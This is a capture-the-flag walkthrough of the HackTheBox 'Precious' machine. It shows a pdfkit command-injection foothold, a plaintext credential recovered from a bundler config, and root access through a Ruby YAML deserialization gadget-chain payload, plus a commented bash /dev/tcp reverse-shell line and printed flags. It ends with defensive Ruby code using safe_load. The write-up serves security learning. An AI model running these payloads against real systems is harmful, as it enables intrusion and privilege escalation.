
HackTheBox - Precious


Recon

Nmap

# Nmap 7.94 scan initiated Mon Feb  5 23:08:59 2024 as: nmap -sCV -T4 -oN nmap.txt 10.10.11.189
Nmap scan report for JSN.JaringanKU (10.10.11.189)
Host is up (0.042s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  5 23:09:10 2024 -- 1 IP address (1 host up) scanned in 10.97 seconds
echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts

Browser


❯ vim test.txt
❯ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...



❯ exiftool ouw1241pjvgxxd5vehgondzv0mtdaw5p.pdf
ExifTool Version Number         : 12.70
File Name                       : ouw1241pjvgxxd5vehgondzv0mtdaw5p.pdf
Directory                       : .
File Size                       : 9.8 kB
File Modification Date/Time     : 2024:02:06 08:13:14+07:00
File Access Date/Time           : 2024:02:06 08:13:15+07:00
File Inode Change Date/Time     : 2024:02:06 08:18:37+07:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Now here's something interesting: Generated by pdfkit v0.8.6. Let's look for an exploit for that version. And I found > this <


Shell into Ruby


❯ nc -nvlp 9001
Connection from 10.10.11.189:34656
bash: cannot set terminal process group (679): Inappropriate ioctl for device
bash: no job control in this shell
ruby@precious:/var/www/pdfapp$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
ruby@precious:/var/www/pdfapp$ export TERM=xterm
export TERM=xterm
ruby@precious:/var/www/pdfapp$ ^Z
[1]  + 47516 suspended  nc -nvlp 9001

❯ stty raw -echo; fg
[1]  + 47516 continued  nc -nvlp 9001

ruby@precious:/var/www/pdfapp$ cd
ruby@precious:~$ ls
ruby@precious:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for ruby:

ruby@precious:~$ ls -la
total 28
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:09 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
lrwxrwxrwx 1 root root    9 Oct 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:16 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile
ruby@precious:~$ cd .bundle
ruby@precious:~/.bundle$ ls -la
total 12
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .
drwxr-xr-x 4 ruby ruby 4096 Feb  5 11:09 ..
-r-xr-xr-x 1 root ruby   62 Sep 26  2022 config
ruby@precious:~/.bundle$ cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Shell into Henry

ssh henry@precious.htb
henry@precious.htb's password: 
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Feb  5 20:42:17 2024 from 10.10.14.26
henry@precious:~$ ls
user.txt
henry@precious:~$ cat user.txt
7754ab9bcbd0e58ec245c32c972eeb09
henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Traceback (most recent call last):
	2: from /opt/update_dependencies.rb:17:in `<main>'
	1: from /opt/update_dependencies.rb:10:in `list_from_file'
/opt/update_dependencies.rb:10:in `read`: No such file or directory @ rb_sysopen - dependencies.yml (Errno::ENOENT)

Let's Google "dependencies.yml privilege escalation". I found > this <

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cp /bin/bash /tmp/kz; chmod 6777 /tmp/kz
         method_id: :resolve
# "bash -c 'bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1'"
henry@precious:/dev/shm$ wget 10.10.14.26:7890/dependencies.yml
--2024-02-05 21:10:41--  http://10.10.14.26:7890/dependencies.yml
Connecting to 10.10.14.26:7890... connected.
HTTP request sent, awaiting response... 200 OK
Length: 638 [application/octet-stream]
Saving to: ‘dependencies.yml’

dependencies.yml         100%[================================>]     638  --.-KB/s    in 0s      

2024-02-05 21:10:41 (59.7 MB/s) - ‘dependencies.yml’ saved [638/638]

henry@precious:/dev/shm$ sudo ruby /opt/update_dependencies.rb 
sh: 1: reading: not found
Traceback (most recent call last):
	33: from /opt/update_dependencies.rb:17:in `<main>'
	32: from /opt/update_dependencies.rb:10:in `list_from_file'
	<snip><snip>
	1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write'
/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system': no implicit conversion of nil into String (TypeError)
henry@precious:/dev/shm$ ls /tmp/kz
/tmp/kz
henry@precious:/dev/shm$ /tmp/kz -p
kz-5.1# ls
dependencies.yml
kz-5.1# cd /root
kz-5.1# ls
root.txt
kz-5.1# cat root.txt
8e1ac4e7ff3b4d430a90c02493eb8cd4
kz-5.1# 
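The root shell above comes from /opt/update_dependencies.rb deserialising an attacker-supplied dependencies.yml with YAML.load, looked up relative to whatever directory sudo was invoked from (here /dev/shm). The code below is an added example and not the box's script: it contrasts that unsafe loading with a safe loader that rejects object tags, and shows a list_from_file that reads from a fixed directory instead of the caller's cwd. The Dependency class, both YAML documents and DEPENDENCY_DIR are constructed assumptions for the demonstration.

```ruby
require 'yaml'

# Benign stand-in for an arbitrary class. With unsafe loading, a YAML document
# can instantiate ANY class Ruby has loaded just by naming it in a tag; the
# Gem::Installer / Net::WriteAdapter chain above abuses exactly that to reach
# Kernel#system.
class Dependency
  attr_accessor :name
end

# Constructed untrusted document: one object tag pointing at a harmless class.
TAGGED_DOC = "--- !ruby/object:Dependency\nname: rails\n".freeze

# Constructed legitimate dependency list made of plain data only.
PLAIN_DOC = "---\ndependencies:\n  - name: rails\n    version: 7.0.4\n".freeze

# Behaviour of YAML.load on the box's Ruby 2.7 (on Psych >= 4 the same
# behaviour is spelled YAML.unsafe_load; YAML.load there is already safe).
def unsafe_load(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened loader: only core scalars and collections are permitted, so any
# !ruby/object tag raises Psych::DisallowedClass instead of building an object.
def safe_load(doc)
  YAML.safe_load(doc, permitted_classes: [], aliases: false)
end

# :plain for data-only YAML, :rejected_object_tag when the document tried to
# instantiate a class (what update_dependencies.rb should have done with the
# payload in the writeup).
def classify(doc)
  safe_load(doc)
  :plain
rescue Psych::DisallowedClass
  :rejected_object_tag
end

# Hardened replacement for the script's list_from_file: the file is looked up
# in a fixed directory (DEPENDENCY_DIR is an assumed, root-owned location), the
# name is reduced to a basename, and the contents go through safe_load. sudo
# keeps the caller's working directory, which is why the original's bare
# 'dependencies.yml' could be supplied from /dev/shm.
DEPENDENCY_DIR = '/opt/dependencies'.freeze

def list_from_file(base_dir = DEPENDENCY_DIR, name = 'dependencies.yml')
  path = File.join(base_dir, File.basename(name))
  safe_load(File.read(path))
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{unsafe_load(TAGGED_DOC).class}"   # Dependency
  puts "safe:   #{classify(TAGGED_DOC)}"            # rejected_object_tag
end
```

The two loaders are the whole story: the same document that unsafe_load turns into a live Dependency object is refused by safe_load before any class is touched. On Ruby 2.7 the fix for the script is to call YAML.safe_load (and to stop depending on the working directory); on Ruby 3.1 and later YAML.load is already safe and only YAML.unsafe_load keeps the old behaviour.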
This post is licensed under CC BY 4.0 by the author.